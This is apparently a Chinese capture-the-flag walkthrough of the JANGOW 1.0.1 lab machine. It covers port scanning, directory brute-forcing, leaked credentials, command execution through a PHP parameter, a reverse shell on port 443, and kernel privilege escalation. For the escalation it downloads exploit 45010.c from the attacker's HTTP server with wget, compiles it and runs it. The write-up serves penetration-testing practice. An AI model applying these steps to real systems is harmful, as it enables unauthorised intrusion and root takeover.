当前位置: 首页 > news >正文

JANGOW: 1.0.1

news 2025/9/13 5:20:36

kali:192.168.223.128

主机发现

nmap -sP 192.168.223.0/24

端口扫描

nmap -p- 192.168.223.154

开启了21 80端口

web看一下,有个busque.php参数是buscar,但是不知道输入什么,尝试文件包含失败

扫描目录

dirsearch -u http://192.168.223.154
dirsearch -u http://192.168.223.154/site

扫到一个backup并且知道这是一个wordpress服务

打开发现有账号密码

jangow01/abygurl69

前面扫到21端口ftp服务,用ftp连接

去busque看一下

原来是可以执行命令,下次测试参数的时候可以尝试RCE

反弹shell

尝试好几种反弹shell语句都失败,看了别人的wp发现靶机之开启了443端口

监听443端口发现拿到shell

在jiangow01目录下找到第一个flag

然后找提权手段

看看suid

看看定时任务

看看备份文件

没什么有用的文件

看看内核版本

Ubuntu 4.4.0-31  16.04

搜一下有没有漏洞

searchsploit ubuntu 4.4.0-31


 

发现有好几个本地提权的

45010.c更符合版本,先下载下来

searchsploit -m 45010.c

看一下内容

可以看到这是个CVE 需要编译

先传到靶机再编译(我试了先编译再上传发现执行失败,不知道什么原因)

mv 45010.c /tmp       #移至tmp目录
python -m http.server 443 #开启http服务wget http://192.168.223.128:443/45010.c  #靶机获取exp
gcc 45010.c -o exp  #编译
chmod +x exp #添加执行权限
./exp  #执行

拿到最终flag

总结1.tfp连接读取敏感文件

        2.内核提权

http://www.lryc.cn/news/306488.html

相关文章:

  • Elasticsearch 创建index库 timeout
  • 2024最新可用免费天气预报API接口
  • 【AIGC】开源声音克隆GPT-SoVITS
  • YOLOv9图像标注和格式转换
  • 车载系统相关
  • AWS对文本进行语言识别
  • HTTP 与HTTPS笔记
  • 【k8s配置与存储--配置管理】
  • 如何在C++中嵌入SQL语句?解释一下什么是ODBC、JDBC以及它们在C++数据库编程中的作用。
  • 【Simulink系列】——动态系统仿真 之 混合系统
  • PHP中的飞碟运算符、取反运算符、对比非ASCII字符串、对比浮点数操作
  • unity-unity2d基础操作笔记(二)0.5.0
  • Feign远程调用(学习笔记)
  • pytorch建模的三种方式
  • GO-ICP的使用(一)
  • FPS游戏漫谈System.GC.Collect()强制进行垃圾回收
  • 第3集《灵峰宗论导读》
  • java面试设计模式篇
  • 桥接模式:解耦抽象与实现,实现灵活多变的扩展结构
  • HUAWEI Programming Contest 2024(AtCoder Beginner Contest 342)
  • Heap sorting
  • 开源模型应用落地-qwen2模型小试-入门篇(六)
  • c#程序,oracle使用Devart驱动解决第第三方库是us7ascii,数据乱码的问题
  • 代码随想录算法训练营第四一天 | 背包问题
  • AIDL的工作原理与使用示例 跨进程通信 远程方法调用RPC
  • K8S部署Java项目 pod报错 logs日志内容:no main manifest attribute, in app.jar
  • SQL实现模糊查询的四种方法总结
  • 爬虫基本库的使用(urllib库的详细解析)
  • 【PyQt5桌面应用开发】3.Qt Designer快速入门(控件详解)
  • react useMemo 用法